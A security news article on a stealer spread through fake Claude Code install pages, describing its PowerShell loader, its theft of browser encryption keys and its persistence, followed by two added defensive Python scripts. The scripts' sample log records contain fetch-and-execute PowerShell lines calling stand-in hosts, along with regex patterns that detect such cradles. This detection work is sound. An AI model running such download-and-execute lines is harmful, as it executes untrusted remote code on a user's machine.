Fake Claude Code Page Pushes PowerShell Stealer at Devs


A previously undocumented information stealer has been distributed through fake Claude Code installation pages, hijacking Chromium browsers to bypass App-Bound Encryption and exfiltrate cookies, passwords and payment data from developer workstations.

The campaign was detailed on 11 May by Ontinue's Cyber Defense Center, which traced the activity to three operator-controlled domains registered within a six-day window in April 2026. Victims arrived at the lookalike installation page after clicking sponsored search results for "install claude code."

The lure page mimicked the layout of legitimate Claude Code documentation but rendered an altered one-line installation command directly in HTML, swapping the canonical Anthropic host for an attacker-controlled domain.

The /install.ps1 file at that domain returned a verbatim copy of the genuine installer, so automated URL scanners saw entirely clean PowerShell, while the command actually shown on the page sent victims elsewhere.

A Native Helper Designed to Evade Behavioral Rules

Once executed, the pasted command fetched a heavily obfuscated PowerShell loader of approximately 600 KB.

The loader enumerated Chromium-family browsers, including Chrome, Edge, Brave, Vivaldi, Perplexity Comet and Arc, and reflectively injected a 4608-byte native helper into a live browser process.

The helper's sole function is to invoke the browser's IElevator2 COM interface, introduced in Chrome 144, to recover the App-Bound Encryption key. The technique mirrors the approach first documented in Glove Stealer in late 2024, but diverges in design.

Ontinue, a provider of AI-powered managed agentic SOC services, noted that the helper exposes no network, file or cryptographic imports. All detection-visible activity, such as SQLite access, archive construction and HTTPS exfiltration, was confined to the PowerShell layer. The split appeared engineered specifically to defeat behavioral rule sets that inspect native binaries in isolation.


Developer Workstations as a High-Value Pivot

Ontinue's compile-date evidence places the sample's construction within 60 days of the Chrome 144 release in January 2026, indicating an actively maintained development effort tracking upstream Chromium changes.

A transcription error in the embedded Edge IElevator2 IID, with two nibbles transposed in the Data3 field, causes the initial call to fail silently and trigger a fallback to the legacy IElevator interface. Ontinue highlighted that the malformed identifier doubles as a high-confidence detection signature.
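Ontinue's point that the mistyped IID is itself a signature suggests a simple hunting check: walk a native module (a dropped file or an in-memory dump) and flag any embedded GUID that is an exact or near-miss variant of a known browser interface ID, reporting which field the deviation sits in. The block below is an added example, not Ontinue's code or a published rule. The real IElevator/IElevator2 identifiers are not on this page, so the reference table holds constructed placeholder values, and the "helper" blob it scans is constructed inline.

```python
"""Scan a binary blob for exact or near-miss variants of known COM interface IDs.

GUIDs are stored on disk in the Windows layout (Data1/Data2/Data3 little-endian,
Data4 as raw bytes), which uuid.UUID(bytes_le=...) decodes directly.
"""
import random
import uuid
from dataclasses import dataclass

# Which GUID field each nibble of the 32-character hex form belongs to.
FIELD_OF_NIBBLE = ["Data1"] * 8 + ["Data2"] * 4 + ["Data3"] * 4 + ["Data4"] * 16

# Placeholder reference IIDs (constructed; NOT the browsers' real identifiers).
KNOWN_IIDS = {
    "Chrome IElevator2 (placeholder)": uuid.UUID("0a1b2c3d-4e5f-6071-8293-a4b5c6d7e8f9"),
    "Edge IElevator2 (placeholder)": uuid.UUID("f9e8d7c6-b5a4-3928-1706-5f4e3d2c1b0a"),
}


@dataclass(frozen=True)
class Finding:
    offset: int      # byte offset of the 16-byte GUID inside the blob
    candidate: str   # GUID found at that offset, in canonical text form
    matches: str     # name of the reference IID it resembles
    kind: str        # "exact", "transposed" (two adjacent nibbles swapped) or "near"
    field: str       # GUID field holding the deviation ("" for an exact match)


def classify(candidate: str, reference: str):
    """Compare two 32-char hex GUID strings; return (kind, field) or None."""
    diff = [i for i in range(32) if candidate[i] != reference[i]]
    if not diff:
        return "exact", ""
    if (len(diff) == 2 and diff[1] == diff[0] + 1
            and candidate[diff[0]] == reference[diff[1]]
            and candidate[diff[1]] == reference[diff[0]]):
        return "transposed", FIELD_OF_NIBBLE[diff[0]]
    if len(diff) <= 2:          # a single mistyped nibble, or two unrelated ones
        return "near", FIELD_OF_NIBBLE[diff[0]]
    return None


def scan_for_iid_variants(blob: bytes, known=KNOWN_IIDS) -> list[Finding]:
    """Slide a 16-byte window over the blob and classify every decodable GUID."""
    findings = []
    for off in range(len(blob) - 15):
        cand = uuid.UUID(bytes_le=blob[off:off + 16]).hex
        for name, ref in known.items():
            result = classify(cand, ref.hex)
            if result:
                findings.append(Finding(off, str(uuid.UUID(cand)), name, *result))
    return findings


# Constructed sample "helper": random filler, a correct placeholder IID, then a
# copy of the Edge placeholder with the two middle nibbles of Data3 transposed.
_rng = random.Random(7)
_filler = bytes(_rng.randrange(256) for _ in range(64))
EDGE_TRANSPOSED = uuid.UUID("f9e8d7c6-b5a4-3298-1706-5f4e3d2c1b0a")
SAMPLE_HELPER = (_filler + KNOWN_IIDS["Chrome IElevator2 (placeholder)"].bytes_le
                 + _filler + EDGE_TRANSPOSED.bytes_le + _filler)

if __name__ == "__main__":
    for f in scan_for_iid_variants(SAMPLE_HELPER):
        print(f"0x{f.offset:04x} {f.candidate} {f.kind:<10} {f.field:<5} ~ {f.matches}")
```

In practice the reference table would be filled from the browsers' published interface definitions, and a "transposed" or "near" hit in Data3 is the case worth alerting on: a legitimate binary either carries the correct IID or does not reference the interface at all.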

The loader established persistence via a Windows scheduled task that polled the operator's C2 every minute and exited early if the host's region matched an exclusion list covering Iran, Russia and other Commonwealth of Independent States (CIS) members, among others.

Vineeta Sangaraju, AI research engineer at Black Duck, said the choice of target is what makes the campaign worth attention.

"Developers hold the keys to an organization's most sensitive assets - intellectual property, cloud infrastructure, CI/CD pipelines," she said. "One compromised developer workstation does not stay contained. It pivots into source code repositories, into cloud environments and into downstream software."

Ontinue urged defenders to enforce PowerShell Constrained Language Mode, enable script block logging and apply web content filtering against newly registered domains.
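Script block logging matters here because Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log records the text the pasted one-liner actually ran, so the swapped installer host is visible after the fact even though the page's HTML never was. The block below is an added example, not Ontinue's tooling: it runs a download-cradle check over constructed 4104 records (exported as dicts), flags any fetch-and-execute whose host is not on a vetted list, and also catches the `DownloadString` cradle form, which goes beyond the specific `irm ... | iex` command the article describes. It assumes claude.ai as the vetted Claude Code installer host; substitute your own allow-list.

```python
"""Flag PowerShell download cradles in script block log (Event ID 4104) records."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Hosts vetted for "fetch and pipe to iex" installers. Assumption: the canonical
# Claude Code installer lives on claude.ai; adjust to your organization's list.
ALLOWED_INSTALLER_HOSTS = {"claude.ai"}

FETCH = r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadFile)\b"
EXEC = r"\b(?:iex|Invoke-Expression)\b"
URL = r"https?://[^\s'\")|]+"
# fetch ... URL ... | iex            (the form seen on the fake install page)
CRADLE_RE = re.compile(rf"{FETCH}[^\n]*?({URL})[^\n]*?\|\s*{EXEC}", re.I)
# iex (...).DownloadString('URL')    (execution wraps the fetch instead)
EXEC_FIRST_RE = re.compile(rf"{EXEC}[^\n]*?{FETCH}[^\n]*?({URL})", re.I)


@dataclass(frozen=True)
class Finding:
    host: str       # workstation that logged the script block
    url: str        # URL fetched and executed
    url_host: str   # hostname extracted from that URL
    allowed: bool   # True if the host is on the vetted installer list


def cradle_urls(script: str) -> list[str]:
    """Return every URL that a script block fetches and executes in one pipeline."""
    urls = []
    for rx in (CRADLE_RE, EXEC_FIRST_RE):
        for m in rx.finditer(script):
            if m.group(1) not in urls:
                urls.append(m.group(1))
    return urls


def detect_cradles(events, allowed_hosts=ALLOWED_INSTALLER_HOSTS) -> list[Finding]:
    """Evaluate 4104 records and report each cradle with its allow-list verdict."""
    findings = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        for url in cradle_urls(ev["script"]):
            url_host = (urlparse(url).hostname or "").lower()
            findings.append(Finding(ev["host"], url, url_host, url_host in allowed_hosts))
    return findings


# Constructed sample records, shaped like a minimal export of 4104 events.
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "DEV-WS-01",
     "script": "irm https://claude.ai/install.ps1 | iex"},
    {"event_id": 4104, "host": "DEV-WS-02",
     "script": "irm https://install-claude-code.example/install.ps1 | iex"},
    {"event_id": 4104, "host": "DEV-WS-02",
     "script": "Get-ChildItem -Recurse -Filter *.csproj"},
    {"event_id": 4104, "host": "DEV-WS-03",
     "script": "iex (New-Object Net.WebClient).DownloadString('https://other.example/x.ps1')"},
    {"event_id": 4103, "host": "DEV-WS-03", "script": "irm https://other.example/y.ps1 | iex"},
]

if __name__ == "__main__":
    for f in detect_cradles(SAMPLE_EVENTS):
        verdict = "allowed" if f.allowed else "ALERT"
        print(f"{verdict:<8} {f.host:<10} {f.url_host:<30} {f.url}")
```

The allow-list verdict is deliberately separate from the cradle match: allowed hits are still worth keeping as an inventory of who installs what, and the same host field is the natural join key against a newly-registered-domain feed, which is the filtering Ontinue recommends and which cannot be evaluated offline.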
